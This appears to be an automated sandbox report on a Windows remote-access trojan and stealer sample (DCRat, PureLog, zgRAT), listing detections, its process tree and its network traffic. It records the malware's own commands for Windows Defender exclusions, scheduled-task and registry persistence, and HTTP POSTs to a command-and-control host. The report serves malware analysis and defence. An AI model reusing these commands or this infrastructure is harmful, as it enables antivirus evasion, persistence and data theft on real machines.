Windows Analysis Report
UuIspZT5b6.exe

Overview

General Information

Sample name: UuIspZT5b6.exe (renamed because original name is a hash value)
Original sample name: 64483e064aa921f94d5b254601db7c97.exe
Analysis ID: 1485769
MD5: 64483e064aa921f94d5b254601db7c97
SHA1: 7bcee1f1f12c6cf5707b99f093e639f13ff77338
SHA256: c5f0a463fdc02fa0a127a4547bb1dcaf06c679a08c0c9e3452b64ac4101ca50d
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • UuIspZT5b6.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\UuIspZT5b6.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
    • csc.exe (PID: 6152 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 2196 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4F01.tmp" "c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 6752 cmdline: schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6752 cmdline: schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6752 cmdline: schtasks.exe /create /tn "UuIspZT5b6U" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\UuIspZT5b6.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • powershell.exe (PID: 6752 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 824 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7176 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7204 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7260 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8064 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 7572 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7796 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7916 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • dllhost.exe (PID: 7288 cmdline: "C:\Recovery\dllhost.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • dllhost.exe (PID: 7120 cmdline: C:\Recovery\dllhost.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • dllhost.exe (PID: 6420 cmdline: C:\Recovery\dllhost.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • Idle.exe (PID: 7740 cmdline: "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • Idle.exe (PID: 7812 cmdline: "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • TyCvtMoTOGrwUAEyotiaCQmKvM.exe (PID: 7860 cmdline: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • TyCvtMoTOGrwUAEyotiaCQmKvM.exe (PID: 7868 cmdline: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • UuIspZT5b6.exe (PID: 7900 cmdline: C:\Users\user\Desktop\UuIspZT5b6.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • UuIspZT5b6.exe (PID: 7908 cmdline: C:\Users\user\Desktop\UuIspZT5b6.exe MD5: 64483E064AA921F94D5B254601DB7C97)
  • dllhost.exe (PID: 6296 cmdline: "C:\Recovery\dllhost.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • TyCvtMoTOGrwUAEyotiaCQmKvM.exe (PID: 7024 cmdline: "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • Idle.exe (PID: 7916 cmdline: "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • UuIspZT5b6.exe (PID: 1888 cmdline: "C:\Users\user\Desktop\UuIspZT5b6.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • dllhost.exe (PID: 4192 cmdline: "C:\Recovery\dllhost.exe" MD5: 64483E064AA921F94D5B254601DB7C97)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
UuIspZT5b6.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
UuIspZT5b6.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1853389921.0000000013345000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1741158644.0000000000CA2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: UuIspZT5b6.exe PID: 6996 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.UuIspZT5b6.exe.ca0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.UuIspZT5b6.exe.ca0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\UuIspZT5b6.exe, ProcessId: 6996, TargetFilename: C:\Recovery\dllhost.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: "C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\UuIspZT5b6.exe, ProcessId: 6996, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TyCvtMoTOGrwUAEyotiaCQmKvM
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', ProcessId: 6752, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Recovery\dllhost.exe, CommandLine: C:\Recovery\dllhost.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\dllhost.exe, NewProcessName: C:\Recovery\dllhost.exe, OriginalFileName: C:\Recovery\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\dllhost.exe, ProcessId: 7120, ProcessName: dllhost.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Recovery\dllhost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\UuIspZT5b6.exe, ProcessId: 6996, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Recovery\dllhost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\UuIspZT5b6.exe, ProcessId: 6996, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Network Connection | Author: bartblaze | Data: DestinationIp: 172.67.203.2, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Recovery\dllhost.exe, Initiated: true, ProcessId: 7288, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", ProcessId: 6152, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', ProcessId: 6752, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f, ProcessId: 6752, ProcessName: schtasks.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\UuIspZT5b6.exe, ProcessId: 6996, TargetFilename: C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe', ProcessId: 6752, ProcessName: powershell.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\UuIspZT5b6.exe", ParentImage: C:\Users\user\Desktop\UuIspZT5b6.exe, ParentProcessId: 6996, ParentProcessName: UuIspZT5b6.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline", ProcessId: 6152, ProcessName: csc.exe
No Snort rule has matched

AV Detection

Source: UuIspZT5b6.exe | Avira: detected
Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\WkrLeKmp.log | Avira: detection malicious, Label: TR/AD.BitpyRansom.lcksd
Source: C:\Recovery\dllhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\MQZNFpoe.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe | ReversingLabs: Detection: 68%
Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe | Virustotal: Detection: 54%
Source: C:\Recovery\dllhost.exe | ReversingLabs: Detection: 68%
Source: C:\Recovery\dllhost.exe | Virustotal: Detection: 54%
Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | ReversingLabs: Detection: 68%
Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | Virustotal: Detection: 54%
Source: C:\Users\user\Desktop\CcvWVetw.log | Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\CkfpANUC.log | Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\MQZNFpoe.log | Virustotal: Detection: 21%
Source: C:\Users\user\Desktop\UZVKerGo.log | Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\WkrLeKmp.log | ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\WkrLeKmp.log | Virustotal: Detection: 41%
Source: C:\Users\user\Desktop\gSKbOmrW.log | Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\lVerBrOi.log | Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\pfMyjKNB.log | Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\tznhlkeP.log | ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\tznhlkeP.log | Virustotal: Detection: 41%
Source: C:\Users\user\Desktop\yfmgiIMl.log | Virustotal: Detection: 21%
Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | ReversingLabs: Detection: 68%
Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | Virustotal: Detection: 54%
Source: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | ReversingLabs: Detection: 68%
Source: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | Virustotal: Detection: 54%
Source: UuIspZT5b6.exe | ReversingLabs: Detection: 68%
Source: UuIspZT5b6.exe | Virustotal: Detection: 54%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe | Joe Sandbox ML: detected
Source: C:\Recovery\dllhost.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\UZVKerGo.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\gSKbOmrW.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CcvWVetw.log | Joe Sandbox ML: detected
Source: UuIspZT5b6.exe | Joe Sandbox ML: detected
Source: UuIspZT5b6.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\UuIspZT5b6.exe | Directory created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
Source: C:\Users\user\Desktop\UuIspZT5b6.exe | Directory created: C:\Program Files\Mozilla Firefox\defaults\pref\6ccacd8608530f
Source: UuIspZT5b6.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.pdb source: UuIspZT5b6.exe, 00000000.00000002.1812160907.000000000398D000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\UuIspZT5b6.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\UuIspZT5b6.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\UuIspZT5b6.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\UuIspZT5b6.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\UuIspZT5b6.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\UuIspZT5b6.exe | File opened: C:\Users\user\AppData\Local

                          Networking

                          barindex
                          Source: C:\Recovery\dllhost.exeNetwork Connect: 172.67.203.2 80
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1284Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
